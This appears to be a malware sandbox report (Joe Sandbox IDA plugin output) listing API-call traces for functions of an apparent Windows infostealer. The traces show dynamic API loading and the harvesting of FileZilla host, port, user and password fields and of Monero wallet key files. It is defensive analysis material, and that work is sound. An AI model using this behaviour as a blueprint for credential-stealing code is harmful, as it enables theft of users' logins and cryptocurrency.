Associated: 00000000.00000002.1895691567.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000972000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.000000000097F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.000000000099F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.00000000009AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.00000000009AE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000A35000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000A55000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000A5B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000ADA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000AEE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000C71000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000D52000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000D77000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000D7E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000D8E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896487362.0000000000D8F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896629602.0000000000F2A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896650514.0000000000F2B000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_890000_file.jbxd

Yara matches

Similarity

API ID: Heap$AllocateNameProcessUser
String ID:
API String ID: 1296208442-0
Opcode ID: 643dce002cf8af3798145dea97a19b5181d75cb51edbc92dccbfdec5446be141
Instruction ID: 820edea21970a72f5891a0d343d29b8ef099bb6da3fff7dd5741b0eaefefec4b
Opcode Fuzzy Hash: 643dce002cf8af3798145dea97a19b5181d75cb51edbc92dccbfdec5446be141
Instruction Fuzzy Hash: 3FF04FB2944208ABD700DFD8DD49BAEBBB8FB05721F10025AFA16E2680C77815058BA1

Function 00891160 Relevance: 3.0, APIs: 2, Instructions: 15COMMON

Download Yara Rule

APIs

GetSystemInfo.KERNEL32(?), ref: 0089116A
ExitProcess.KERNEL32 ref: 0089117E

Memory Dump Source

Source File: 00000000.00000002.1895691567.0000000000891000.00000040.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true

Associated: 00000000.00000002.1895669450.0000000000890000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.00000000008EA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000915000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000918000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.000000000091F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000922000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000941000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000972000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.000000000097F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.000000000099F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.00000000009AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.00000000009AE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000A35000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000A55000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000A5B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000ADA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000AEE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000C71000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000D52000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000D77000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000D7E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000D8E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896487362.0000000000D8F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896629602.0000000000F2A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896650514.0000000000F2B000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_890000_file.jbxd

Yara matches

Similarity

API ID: ExitInfoProcessSystem
String ID:
API String ID: 752954902-0
Opcode ID: 2b41da8ab9a5a0b07b4612ef80b9a4ed5ba81c52f1d2ee7dd38263915c9b81d3
Instruction ID: 15e7481d715239cf0292638546aeb62dc063fc423ed9c5a551a25841befbd7a0
Opcode Fuzzy Hash: 2b41da8ab9a5a0b07b4612ef80b9a4ed5ba81c52f1d2ee7dd38263915c9b81d3
Instruction Fuzzy Hash: 97D05E7490530CDBCF00EFE0D8496DDBB78FB08312F001595D906A2340EA305482CBA6

Function 008A9C10 Relevance: 200.2, APIs: 112, Strings: 2, Instructions: 684
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcAddress.KERNEL32(74DD0000,01415970), ref: 008A9C2D
GetProcAddress.KERNEL32(74DD0000,01415910), ref: 008A9C45
GetProcAddress.KERNEL32(74DD0000,014296B8), ref: 008A9C5E
GetProcAddress.KERNEL32(74DD0000,01429670), ref: 008A9C76
GetProcAddress.KERNEL32(74DD0000,01429658), ref: 008A9C8E
GetProcAddress.KERNEL32(74DD0000,014296A0), ref: 008A9CA7
GetProcAddress.KERNEL32(74DD0000,0141BAE0), ref: 008A9CBF
GetProcAddress.KERNEL32(74DD0000,0142D0B0), ref: 008A9CD7
GetProcAddress.KERNEL32(74DD0000,0142CEB8), ref: 008A9CF0
GetProcAddress.KERNEL32(74DD0000,0142CEA0), ref: 008A9D08
GetProcAddress.KERNEL32(74DD0000,0142CF48), ref: 008A9D20
GetProcAddress.KERNEL32(74DD0000,014156D0), ref: 008A9D39
GetProcAddress.KERNEL32(74DD0000,01415810), ref: 008A9D51
GetProcAddress.KERNEL32(74DD0000,01415990), ref: 008A9D69
GetProcAddress.KERNEL32(74DD0000,014158D0), ref: 008A9D82
GetProcAddress.KERNEL32(74DD0000,0142CDF8), ref: 008A9D9A
GetProcAddress.KERNEL32(74DD0000,0142CEE8), ref: 008A9DB2
GetProcAddress.KERNEL32(74DD0000,0141BB08), ref: 008A9DCB
GetProcAddress.KERNEL32(74DD0000,01415730), ref: 008A9DE3
GetProcAddress.KERNEL32(74DD0000,0142CE40), ref: 008A9DFB
GetProcAddress.KERNEL32(74DD0000,0142D050), ref: 008A9E14
GetProcAddress.KERNEL32(74DD0000,0142D0C8), ref: 008A9E2C
GetProcAddress.KERNEL32(74DD0000,0142CE70), ref: 008A9E44
GetProcAddress.KERNEL32(74DD0000,014159B0), ref: 008A9E5D
GetProcAddress.KERNEL32(74DD0000,0142CF90), ref: 008A9E75
GetProcAddress.KERNEL32(74DD0000,0142D068), ref: 008A9E8D
GetProcAddress.KERNEL32(74DD0000,0142CF60), ref: 008A9EA6
GetProcAddress.KERNEL32(74DD0000,0142CFF0), ref: 008A9EBE
GetProcAddress.KERNEL32(74DD0000,0142D080), ref: 008A9ED6
GetProcAddress.KERNEL32(74DD0000,0142CF18), ref: 008A9EEF
GetProcAddress.KERNEL32(74DD0000,0142CE10), ref: 008A9F07
GetProcAddress.KERNEL32(74DD0000,0142CF00), ref: 008A9F1F
GetProcAddress.KERNEL32(74DD0000,0142CE28), ref: 008A9F38
GetProcAddress.KERNEL32(74DD0000,0142A7B0), ref: 008A9F50
GetProcAddress.KERNEL32(74DD0000,0142D0E0), ref: 008A9F68
GetProcAddress.KERNEL32(74DD0000,0142CF78), ref: 008A9F81
GetProcAddress.KERNEL32(74DD0000,01415750), ref: 008A9F99
GetProcAddress.KERNEL32(74DD0000,0142D098), ref: 008A9FB1
GetProcAddress.KERNEL32(74DD0000,01415890), ref: 008A9FCA
GetProcAddress.KERNEL32(74DD0000,0142D008), ref: 008A9FE2
GetProcAddress.KERNEL32(74DD0000,0142CE88), ref: 008A9FFA
GetProcAddress.KERNEL32(74DD0000,014157D0), ref: 008AA013
GetProcAddress.KERNEL32(74DD0000,01415E30), ref: 008AA02B
LoadLibraryA.KERNEL32(0142D038,?,008A5CA3,008B0AEB,?,?,?,?,?,?,?,?,?,?,008B0AEA,008B0AE3), ref: 008AA03D
LoadLibraryA.KERNEL32(0142CFA8,?,008A5CA3,008B0AEB,?,?,?,?,?,?,?,?,?,?,008B0AEA,008B0AE3), ref: 008AA04E
LoadLibraryA.KERNEL32(0142CE58,?,008A5CA3,008B0AEB,?,?,?,?,?,?,?,?,?,?,008B0AEA,008B0AE3), ref: 008AA060
LoadLibraryA.KERNEL32(0142D020,?,008A5CA3,008B0AEB,?,?,?,?,?,?,?,?,?,?,008B0AEA,008B0AE3), ref: 008AA072
LoadLibraryA.KERNEL32(0142CED0,?,008A5CA3,008B0AEB,?,?,?,?,?,?,?,?,?,?,008B0AEA,008B0AE3), ref: 008AA083
LoadLibraryA.KERNEL32(0142CF30,?,008A5CA3,008B0AEB,?,?,?,?,?,?,?,?,?,?,008B0AEA,008B0AE3), ref: 008AA095
LoadLibraryA.KERNEL32(0142CFC0,?,008A5CA3,008B0AEB,?,?,?,?,?,?,?,?,?,?,008B0AEA,008B0AE3), ref: 008AA0A7
LoadLibraryA.KERNEL32(0142CFD8,?,008A5CA3,008B0AEB,?,?,?,?,?,?,?,?,?,?,008B0AEA,008B0AE3), ref: 008AA0B8
GetProcAddress.KERNEL32(75290000,01415C50), ref: 008AA0DA
GetProcAddress.KERNEL32(75290000,0142D2D8), ref: 008AA0F2
GetProcAddress.KERNEL32(75290000,014292C8), ref: 008AA10A
GetProcAddress.KERNEL32(75290000,0142D3E0), ref: 008AA123
GetProcAddress.KERNEL32(75290000,01415AB0), ref: 008AA13B
GetProcAddress.KERNEL32(6FB50000,0141B608), ref: 008AA160
GetProcAddress.KERNEL32(6FB50000,01415E10), ref: 008AA179
GetProcAddress.KERNEL32(6FB50000,0141BA18), ref: 008AA191
GetProcAddress.KERNEL32(6FB50000,0142D3C8), ref: 008AA1A9
GetProcAddress.KERNEL32(6FB50000,0142D350), ref: 008AA1C2
GetProcAddress.KERNEL32(6FB50000,01415AF0), ref: 008AA1DA
GetProcAddress.KERNEL32(6FB50000,01415C70), ref: 008AA1F2
GetProcAddress.KERNEL32(6FB50000,0142D2F0), ref: 008AA20B
GetProcAddress.KERNEL32(752C0000,01415C90), ref: 008AA22C
GetProcAddress.KERNEL32(752C0000,01415BB0), ref: 008AA244
GetProcAddress.KERNEL32(752C0000,0142D218), ref: 008AA25D
GetProcAddress.KERNEL32(752C0000,0142D170), ref: 008AA275
GetProcAddress.KERNEL32(752C0000,01415CB0), ref: 008AA28D
GetProcAddress.KERNEL32(74EC0000,0141B798), ref: 008AA2B3
GetProcAddress.KERNEL32(74EC0000,0141BA40), ref: 008AA2CB
GetProcAddress.KERNEL32(74EC0000,0142D2A8), ref: 008AA2E3
GetProcAddress.KERNEL32(74EC0000,01415B10), ref: 008AA2FC
GetProcAddress.KERNEL32(74EC0000,01415D10), ref: 008AA314
GetProcAddress.KERNEL32(74EC0000,0141B9C8), ref: 008AA32C
GetProcAddress.KERNEL32(75BD0000,0142D398), ref: 008AA352
GetProcAddress.KERNEL32(75BD0000,01415E50), ref: 008AA36A
GetProcAddress.KERNEL32(75BD0000,014291A8), ref: 008AA382
GetProcAddress.KERNEL32(75BD0000,0142D260), ref: 008AA39B
GetProcAddress.KERNEL32(75BD0000,0142D278), ref: 008AA3B3
GetProcAddress.KERNEL32(75BD0000,01415AD0), ref: 008AA3CB
GetProcAddress.KERNEL32(75BD0000,01415B30), ref: 008AA3E4
GetProcAddress.KERNEL32(75BD0000,0142D1B8), ref: 008AA3FC
GetProcAddress.KERNEL32(75BD0000,0142D1D0), ref: 008AA414
GetProcAddress.KERNEL32(75A70000,01415DF0), ref: 008AA436
GetProcAddress.KERNEL32(75A70000,0142D230), ref: 008AA44E
GetProcAddress.KERNEL32(75A70000,0142D308), ref: 008AA466
GetProcAddress.KERNEL32(75A70000,0142D1E8), ref: 008AA47F
GetProcAddress.KERNEL32(75A70000,0142D200), ref: 008AA497
GetProcAddress.KERNEL32(75450000,01415BD0), ref: 008AA4B8
GetProcAddress.KERNEL32(75450000,01415B50), ref: 008AA4D1
GetProcAddress.KERNEL32(75DA0000,01415B70), ref: 008AA4F2
GetProcAddress.KERNEL32(75DA0000,0142D0F8), ref: 008AA50A
GetProcAddress.KERNEL32(6F070000,01415C10), ref: 008AA530
GetProcAddress.KERNEL32(6F070000,01415B90), ref: 008AA548
GetProcAddress.KERNEL32(6F070000,01415D90), ref: 008AA560
GetProcAddress.KERNEL32(6F070000,0142D1A0), ref: 008AA579
GetProcAddress.KERNEL32(6F070000,01415CD0), ref: 008AA591
GetProcAddress.KERNEL32(6F070000,01415BF0), ref: 008AA5A9
GetProcAddress.KERNEL32(6F070000,01415D70), ref: 008AA5C2
GetProcAddress.KERNEL32(6F070000,01415C30), ref: 008AA5DA
GetProcAddress.KERNEL32(6F070000,InternetSetOptionA), ref: 008AA5F1
GetProcAddress.KERNEL32(6F070000,HttpQueryInfoA), ref: 008AA607
GetProcAddress.KERNEL32(75AF0000,0142D140), ref: 008AA629
GetProcAddress.KERNEL32(75AF0000,01429238), ref: 008AA641
GetProcAddress.KERNEL32(75AF0000,0142D320), ref: 008AA659
GetProcAddress.KERNEL32(75AF0000,0142D3B0), ref: 008AA672
GetProcAddress.KERNEL32(75D90000,01415CF0), ref: 008AA693
GetProcAddress.KERNEL32(6CFD0000,0142D290), ref: 008AA6B4
GetProcAddress.KERNEL32(6CFD0000,01415D30), ref: 008AA6CD
GetProcAddress.KERNEL32(6CFD0000,0142D248), ref: 008AA6E5
GetProcAddress.KERNEL32(6CFD0000,0142D110), ref: 008AA6FD

Strings

HttpQueryInfoA, xrefs: 008AA5FC
InternetSetOptionA, xrefs: 008AA5E5

Memory Dump Source

Source File: 00000000.00000002.1895691567.0000000000891000.00000040.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true

Associated: 00000000.00000002.1895669450.0000000000890000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.00000000008EA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000915000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000918000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.000000000091F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000922000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000941000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000972000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.000000000097F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.000000000099F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.00000000009AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.00000000009AE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000A35000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000A55000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000A5B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000ADA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000AEE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000C71000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000D52000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000D77000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000D7E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000D8E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896487362.0000000000D8F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896629602.0000000000F2A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896650514.0000000000F2B000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_890000_file.jbxd

Yara matches

Similarity

API ID: AddressProc$LibraryLoad
String ID: HttpQueryInfoA$InternetSetOptionA
API String ID: 2238633743-1775429166
Opcode ID: f338900a5ef6565c67e3aa9a1ad9f5651a519cbfe3dd3c5f40a216dc866c909e
Instruction ID: 7cd6284f1c8534f4e04627c32a860670a6d8488dd2311c282b26f7e70a06998c
Opcode Fuzzy Hash: f338900a5ef6565c67e3aa9a1ad9f5651a519cbfe3dd3c5f40a216dc866c909e
Instruction Fuzzy Hash: 95623BBA602241AFC744DFE8ED8899A37F9F76C701714851BAA0BC3264D7399943DF12

Function 00897710 Relevance: 81.6, APIs: 54, Instructions: 584
stringmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcessHeap.KERNEL32(00000000,0098967F), ref: 00897724
RtlAllocateHeap.NTDLL(00000000), ref: 0089772B
lstrcat.KERNEL32(?,01429C80), ref: 008978DB
lstrcat.KERNEL32(?,?), ref: 008978EF
lstrcat.KERNEL32(?,?), ref: 00897903
lstrcat.KERNEL32(?,?), ref: 00897917
lstrcat.KERNEL32(?,0142E440), ref: 0089792B
lstrcat.KERNEL32(?,0142E1E8), ref: 0089793F
lstrcat.KERNEL32(?,0142E398), ref: 00897952
lstrcat.KERNEL32(?,0142E308), ref: 00897966
lstrcat.KERNEL32(?,01429D08), ref: 0089797A
lstrcat.KERNEL32(?,?), ref: 0089798E
lstrcat.KERNEL32(?,?), ref: 008979A2
lstrcat.KERNEL32(?,?), ref: 008979B6
lstrcat.KERNEL32(?,0142E440), ref: 008979C9
lstrcat.KERNEL32(?,0142E1E8), ref: 008979DD
lstrcat.KERNEL32(?,0142E398), ref: 008979F1
lstrcat.KERNEL32(?,0142E308), ref: 00897A04
lstrcat.KERNEL32(?,01429D70), ref: 00897A18
lstrcat.KERNEL32(?,?), ref: 00897A2C
lstrcat.KERNEL32(?,?), ref: 00897A40
lstrcat.KERNEL32(?,?), ref: 00897A54
lstrcat.KERNEL32(?,0142E440), ref: 00897A68
lstrcat.KERNEL32(?,0142E1E8), ref: 00897A7B
lstrcat.KERNEL32(?,0142E398), ref: 00897A8F
lstrcat.KERNEL32(?,0142E308), ref: 00897AA3
lstrcat.KERNEL32(?,01429DD8), ref: 00897AB6
lstrcat.KERNEL32(?,?), ref: 00897ACA
lstrcat.KERNEL32(?,?), ref: 00897ADE
lstrcat.KERNEL32(?,?), ref: 00897AF2
lstrcat.KERNEL32(?,0142E440), ref: 00897B06
lstrcat.KERNEL32(?,0142E1E8), ref: 00897B1A
lstrcat.KERNEL32(?,0142E398), ref: 00897B2D
lstrcat.KERNEL32(?,0142E308), ref: 00897B41
lstrcat.KERNEL32(?,0142E648), ref: 00897B55
lstrcat.KERNEL32(?,?), ref: 00897B69
lstrcat.KERNEL32(?,?), ref: 00897B7D
lstrcat.KERNEL32(?,?), ref: 00897B91
lstrcat.KERNEL32(?,0142E440), ref: 00897BA4
lstrcat.KERNEL32(?,0142E1E8), ref: 00897BB8
lstrcat.KERNEL32(?,0142E398), ref: 00897BCC
lstrcat.KERNEL32(?,0142E308), ref: 00897BDF
lstrcat.KERNEL32(?,0142E6B0), ref: 00897BF3
lstrcat.KERNEL32(?,?), ref: 00897C07
lstrcat.KERNEL32(?,?), ref: 00897C1B
lstrcat.KERNEL32(?,?), ref: 00897C2F
lstrcat.KERNEL32(?,0142E440), ref: 00897C43
lstrcat.KERNEL32(?,0142E1E8), ref: 00897C56
lstrcat.KERNEL32(?,0142E398), ref: 00897C6A
lstrcat.KERNEL32(?,0142E308), ref: 00897C7E

Part of subcall function 008975D0: lstrcat.KERNEL32(2FB00020,008B17FC), ref: 00897606
Part of subcall function 008975D0: lstrcat.KERNEL32(2FB00020,00000000), ref: 00897648
Part of subcall function 008975D0: lstrcat.KERNEL32(2FB00020, : ), ref: 0089765A
Part of subcall function 008975D0: lstrcat.KERNEL32(2FB00020,00000000), ref: 0089768F
Part of subcall function 008975D0: lstrcat.KERNEL32(2FB00020,008B1804), ref: 008976A0
Part of subcall function 008975D0: lstrcat.KERNEL32(2FB00020,00000000), ref: 008976D3
Part of subcall function 008975D0: lstrcat.KERNEL32(2FB00020,008B1808), ref: 008976ED
Part of subcall function 008975D0: task.LIBCPMTD ref: 008976FB

lstrcat.KERNEL32(?,0142E8F8), ref: 00897E0B
lstrcat.KERNEL32(?,0142DD80), ref: 00897E1E
lstrlen.KERNEL32(2FB00020), ref: 00897E2B
lstrlen.KERNEL32(2FB00020), ref: 00897E3B

Part of subcall function 008AA740: lstrcpy.KERNEL32(008B0E17,00000000), ref: 008AA788

Memory Dump Source

Source File: 00000000.00000002.1895691567.0000000000891000.00000040.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true

Associated: 00000000.00000002.1895669450.0000000000890000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.00000000008EA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000915000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000918000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.000000000091F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000922000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000941000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000972000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.000000000097F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.000000000099F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.00000000009AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.00000000009AE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000A35000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000A55000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000A5B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000ADA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000AEE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000C71000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000D52000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000D77000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000D7E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000D8E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896487362.0000000000D8F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896629602.0000000000F2A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896650514.0000000000F2B000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_890000_file.jbxd

Yara matches

Similarity

API ID: lstrcat$Heaplstrlen$AllocateProcesslstrcpytask
String ID:
API String ID: 928082926-0
Opcode ID: 5f93e7a783a02f905ac2d18c6027a28e5b8bb6992304a0a4b66a3d74f0755784
Instruction ID: b3f50ad1a2e87e1bac50955368be1520b97456504aea3fcbedb8d2ac854670b3
Opcode Fuzzy Hash: 5f93e7a783a02f905ac2d18c6027a28e5b8bb6992304a0a4b66a3d74f0755784
Instruction Fuzzy Hash: 59323EB2C10354ABDB11EBE0DC85DEE777CBB54700F044699F21AA2490EA74E786CF62

Function 008A0250 Relevance: 68.6, APIs: 29, Strings: 10, Instructions: 366
stringmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 008AA740: lstrcpy.KERNEL32(008B0E17,00000000), ref: 008AA788

Part of subcall function 008A8DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 008A8E0B

Part of subcall function 008AA920: lstrcpy.KERNEL32(00000000,?), ref: 008AA972
Part of subcall function 008AA920: lstrcat.KERNEL32(00000000), ref: 008AA982

Part of subcall function 008AA8A0: lstrcpy.KERNEL32(?,008B0E17), ref: 008AA905

Part of subcall function 008AA9B0: lstrlen.KERNEL32(?,01429018,?,\Monero\wallet.keys,008B0E17), ref: 008AA9C5
Part of subcall function 008AA9B0: lstrcpy.KERNEL32(00000000), ref: 008AAA04
Part of subcall function 008AA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 008AAA12

Part of subcall function 008AA7A0: lstrcpy.KERNEL32(?,00000000), ref: 008AA7E6

Part of subcall function 008999C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 008999EC
Part of subcall function 008999C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00899A11
Part of subcall function 008999C0: LocalAlloc.KERNEL32(00000040,?), ref: 00899A31
Part of subcall function 008999C0: ReadFile.KERNEL32(000000FF,?,00000000,0089148F,00000000), ref: 00899A5A
Part of subcall function 008999C0: LocalFree.KERNEL32(0089148F), ref: 00899A90
Part of subcall function 008999C0: CloseHandle.KERNEL32(000000FF), ref: 00899A9A

Part of subcall function 008A8E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 008A8E52

GetProcessHeap.KERNEL32(00000000,000F423F,008B0DBA,008B0DB7,008B0DB6,008B0DB3), ref: 008A0362
RtlAllocateHeap.NTDLL(00000000), ref: 008A0369
StrStrA.SHLWAPI(00000000,<Host>), ref: 008A0385
lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,008B0DB2), ref: 008A0393
StrStrA.SHLWAPI(00000000,<Port>), ref: 008A03CF
lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,008B0DB2), ref: 008A03DD
StrStrA.SHLWAPI(00000000,<User>), ref: 008A0419
lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,008B0DB2), ref: 008A0427
StrStrA.SHLWAPI(00000000,<Pass encoding="base64">), ref: 008A0463
lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,008B0DB2), ref: 008A0475
lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,008B0DB2), ref: 008A0502
lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,008B0DB2), ref: 008A051A
lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,008B0DB2), ref: 008A0532
lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,008B0DB2), ref: 008A054A
lstrcat.KERNEL32(?,browser: FileZilla), ref: 008A0562
lstrcat.KERNEL32(?,profile: null), ref: 008A0571
lstrcat.KERNEL32(?,url: ), ref: 008A0580
lstrcat.KERNEL32(?,00000000), ref: 008A0593
lstrcat.KERNEL32(?,008B1678), ref: 008A05A2
lstrcat.KERNEL32(?,00000000), ref: 008A05B5
lstrcat.KERNEL32(?,008B167C), ref: 008A05C4
lstrcat.KERNEL32(?,login: ), ref: 008A05D3
